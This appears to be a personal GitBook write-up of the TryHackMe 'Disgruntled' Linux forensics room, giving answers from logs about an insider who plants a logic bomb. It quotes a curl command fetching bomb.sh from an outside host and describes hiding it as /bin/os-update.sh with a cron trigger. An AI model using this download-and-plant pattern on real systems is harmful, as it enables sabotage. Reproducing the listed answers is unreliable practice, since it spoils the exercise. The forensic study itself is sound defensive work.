📖
Medhat Fathy
  • Whoami
  • cyber kill chain Arabic
  • Incident Response Process Arabic
  • PythonScripts
  • BTL1 Notes
  • Threat Hunting Hypothesis
  • writesUp
    • Boss Of The Soc V1
    • Network Hunting with zeek & wireshak
    • Hammered Cyberdefenders
    • Hacked Cyberdefenders
    • HireMe CyberDefenders
    • Sysinternals cyberdefenders
    • Hunting .Net Malware
    • Unattended TryHackMe
    • Disgruntled TryHackMe
    • RDP Cache Forensics
  • Use Case With elk
  • Hunting with elk
  • hunting with Splunk
  • Digital Forensics
  • SOC Roadmap "Rooms and Challanges zero 2 hero "
  • SOC Roadmap for Cat Reloaded Team
  • Soc Interviews
  • Investigating with Windows Event Logs
  • Detect AD attacks
  • Hunt Evil
  • cs
  • Crowdstrike Random
  • Random Notes
  • KQL
  • Threat Hunting series
    • Hunting with ATP
      • Hunting Attacks Using ATP part 2
      • Hunting Attacks Using ATP part 1
  • CTHPv2 prep
    • Introduction to Threat Hunting
    • Threat Hunting Terminology
    • Threat Intelligence
    • Practical Exercise on threat intelligence
  • Attacks & Detections
    • part 1
    • part 2
    • part 3
    • Part 4
    • Part 5
    • Part 6
Powered by GitBook
  1. writesUp

Disgruntled TryHackMe

Use your Linux forensics knowledge to investigate an incident.

PreviousUnattended TryHackMeNextRDP Cache Forensics

Last updated 1 year ago

Task 3 Nothing suspicious... So far

Here’s the machine our disgruntled IT user last worked on. Check if there’s anything our client needs to be worried about.

My advice: Look at the privileged commands that were run. That should get you started.

Q1) The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND?

Check the sudo execution history.

We can investigate the bash_history file under the /home directory

sudo apt install dokuwiki

Ans : /usr/bin/apt install dokuwiki

Q2) What was the present working directory (PWD) when the previous command was run?

by looking in the /home

Ans : /home/cybert

Task 4 Let’s see if you did anything bad

Keep going. Our disgruntled IT was supposed to only install a service on this computer, so look for commands that are unrelated to that.

Q3) Which user was created after the package from the previous task was installed?

By looking in the Second photos we found sudo adduser it-admin

Ans : it-admin

Q4) A user was then later given sudo priveleges. When was the sudoers file updated? (Format: Month Day HH:MM:SS)

let's investigate log files 

vim /var/log/auth.log

I found IT

Ans : Dec 28 06:27:34

Q5) A script file was opened using the "vi" text editor. What is the name of this file?

remember the created acount , let's investigate bash history in it

Ans : bomb.sh

Task 5 Bomb has been planted. But when and where?

That bomb.sh file is a huge red flag! While a file is already incriminating in itself, we still need to find out where it came from and what it contains. The problem is that the file does not exist anymore.

Q6) What is the command used that created the file bomb.sh?

From the prev screen

Ans : curl 10.10.158.38:8080/bomb.sh --output bomb.sh

Q7 The file was renamed and moved to a different directory. What is the full path of this file now?

The vi text editor can edit and save files to a different location

let's investigate viminfo

Ans : /bin/os-update.sh

Q8 ) When was the file from the previous question last modified? (Format: Month Day HH:MM)

Ans : Dec 28 06:29

Q9) What is the name of the file that will get created when the file from the first question executes?

Ans : goodbye.txt

Task 6 Following the fuse

So we have a file and a motive. The question we now have is: how will this file be executed?

Q10 ) At what time will the malicious file trigger? (Format: HH:MM AM/PM)

by going to https://crontab.guru/

Ans : 08:00 Am

I think the challange it's not easy , its very easy <3

😄
cat /home/cybert/.bash_history
easy :)
the file is goodbye.txt
Page cover image